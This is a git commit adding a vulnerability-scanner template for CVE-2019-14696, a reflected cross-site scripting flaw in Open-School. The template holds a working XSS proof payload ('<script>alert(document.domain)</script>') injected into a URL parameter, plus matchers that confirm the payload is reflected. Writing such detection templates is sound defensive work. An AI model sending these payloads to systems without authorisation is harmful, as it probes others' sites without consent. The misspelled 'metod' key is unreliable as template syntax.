Create CVE-2019-14696.yaml
parent
da02a01794
commit
cc1e0a3fef
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2019-14696
|
||||
|
||||
info:
|
||||
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
|
||||
author: pikpikcu
|
||||
severity: Medium
|
||||
|
||||
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
|
||||
# Vendor Homepage: [https://open-school.org/]
|
||||
|
||||
requests:
|
||||
- metod: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?r=students/guardians/create&id=1"><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
part: body
|
Loading…
Reference in New Issue